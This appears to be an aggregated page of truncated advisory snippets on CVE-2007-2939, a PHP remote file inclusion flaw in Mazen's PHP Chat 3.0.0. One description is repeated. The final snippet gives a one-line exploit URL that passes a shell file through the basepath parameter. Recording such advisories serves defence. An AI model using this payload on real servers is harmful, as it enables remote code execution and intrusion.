CVE-2007-2939

Multiple PHP remote file inclusion vulnerabilities in Mazen's PHP Chat 3.0.0 allow remote attackers to execute arbitrary PHP code via a URL in the basepath parameter to 1 ITX.php, 2 ITError.php, or 3 IT.php in include/pear/...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in Mazen's PHP Chat 3.0.0 allow remote attackers to execute arbitrary PHP code via a URL in the basepath parameter to 1 ITX.php, 2 ITError.php, or 3 IT.php in include/pear/...

CVE-2007-2939

Maven/Mazen’s PHP Chat 3.0.0 is affected by multiple PHP remote file inclusion vulnerabilities. The issue arises when an attacker can supply a URL via the basepath parameter to include/pear/ITX.php, IT_Error.php, or IT.php, enabling remote code execution on the server. The CVE-2007-2939 entry doc...

Mazens PHP Chat V3 (basepath) - Remote File Inclusion

Mazens PHP Chat V3 basepath - Remote File Inclusion Mazen's PHP Chat V3.0.0 Beta1 Remote file inclusion Download script : http://www.scriptbrasil.com.br/script/php/batepapo/mazenphpopenchmt221.tar.gz Thanks Str0ke :D Exploit : http://victim.com/chatpath/include/pear/ITX.php?basepath=shell.txt?...